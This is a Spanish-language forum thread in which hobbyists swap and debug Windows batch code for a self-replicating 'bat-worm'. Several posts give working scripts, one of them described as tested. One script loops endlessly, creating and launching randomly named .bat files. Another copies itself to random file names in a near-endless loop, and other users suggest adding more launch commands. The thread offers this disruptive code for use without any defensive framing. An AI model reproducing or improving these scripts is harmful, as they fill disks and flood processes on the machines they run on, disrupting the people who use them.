Autor
|
Tema: [BATCH] Worm. ¿Funcionaria? (Leído 10,502 veces)
|
Eleкtro
Ex-Staff
|
@Seazoux Es un """"bat-gusano"""" con un bucle infinito que genera archivos con nombre aleatorio y los inicia.
El código de arriba no te va a funcionar, por esta línea: echo @echo off>>%U%>>%T%.bat Como ya dije, hay que escapar los caracteres, así si que funciona (Comprobado): color 02 :go set "U= %random%%random%%random%%random%%random%%random%%random%%random%%random%" ( echo set "T= %random%%random%%random%%random%%random%%random%%random%%random%%random%" )>>"%U%.bat" start /B %U%.bat
Saludos!
|
|
|
|
|
|
|
z3nth10n
"Jack of all trades, master of none." - Zenthion
|
Eso es mas p*tada que nada, yo he llegado a hacer un bat-bucle (todo a lo batman ) que abre niñas del exorcistas y mas niñas del exorcistas xDDDDDDDDD
|
|
|
|
⏩ Interesados hablad por Discord.
|
|
|
Ori-chan
El rey de los novatos en persona.
|
Eso es mas p*tada que nada, yo he llegado a hacer un bat-bucle (todo a lo batman ) que abre niñas del exorcistas y mas niñas del exorcistas xDDDDDDDDD Me gustaria verlo, parece interesante
|
|
|
|
|
|
|
Meine programmen
|
Un pequeño dato Orion. Si pones En %U%.bat no pondra Si no que pondra un numero aleatorio. Para que el resultado sea el de arriba tienes que poner echo %%random%%>> %U%.bat Y si quieres que el resultado sea El codigo deberia ser echo echo %%%%random%%%%^>^>%%U%%.bat>>%U%.bat No se si me hago de entender. PD: Me gusto el hecho de que usases la U
|
|
|
|
REMEMBER! Reality is an illusion, the universe is a hologram, BUY GOLD! BYE!!
|
|
|
Ori-chan
|
Un pequeño dato Orion. Si pones En %U%.bat no pondra Si no que pondra un numero aleatorio. Para que el resultado sea el de arriba tienes que poner echo %%random%%>> %U%.bat Y si quieres que el resultado sea El codigo deberia ser echo echo %%%%random%%%%^>^>%%U%%.bat>>%U%.bat No se si me hago de entender. PD: Me gusto el hecho de que usases la U Bueno, EleKtro dice que lo ha probado y que va. Así que una de dos, o estas equivocado o funciona de las dos maneras. PD: ¿Por que será que use la U?...
|
|
|
|
|
|
|
Meine programmen
|
El problema es que de la manera de Elektro crearia el mismo archivo con los parametros iniciales (Supongo, vamos, pero alguna cosa asi tiene que haber). Ademas, ¿No es mas efectivo crear una archivo que se copie a si mismo?
|
|
|
|
|
|
|
Ori-chan
|
Si, ademas se le podría meter algunos 'start' por ahí.
|
|
|
|
|
|
|
z3nth10n
"Jack of all trades, master of none." - Zenthion
|
|
|
|
|
⏩ Interesados hablad por Discord.
|
|
|
Eleкtro
Ex-Staff
|
El problema es que de la manera de Elektro crearia el mismo archivo con los parametros iniciales (Supongo, vamos, pero alguna cosa asi tiene que haber). Ademas, ¿No es mas efectivo crear una archivo que se copie a si mismo? El bat funciona, se generan miles de archivos y cada uno de ellos lanza un "Start", eso sí, un pequeño fallo hay que no me he puesto a investigar, porque se crea un archivo llamado ".bat", quizás no escapé alguna variable necesaria, no me he puesto a mirarlo. ¿No es mas efectivo crear una archivo que se copie a si mismo? Aquí os dejo el código por si os sirve. For /L %%# in (1,1,999999999999999999 ) do ( CLS (Call Copy /Y " %~0" " %%RANDOM%%%%RANDOM%%%%RANDOM%%.bat" 1 >NUL) Call Echo %%CONTADOR%% archivos creados... )
|
|
« Última modificación: 23 Diciembre 2012, 00:13 am por EleKtro H@cker »
|
|
|
|
|
Meine programmen
|
For /L %%# in (1,1,999999999999999999 ) do ( CLS (Call Copy /Y " %~0" " %%RANDOM%%%%RANDOM%%%%RANDOM%%.bat" 1 >NUL) Call Echo %%CONTADOR%% archivos creados... )
Me gusto el detalle de "archivos creados" .
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|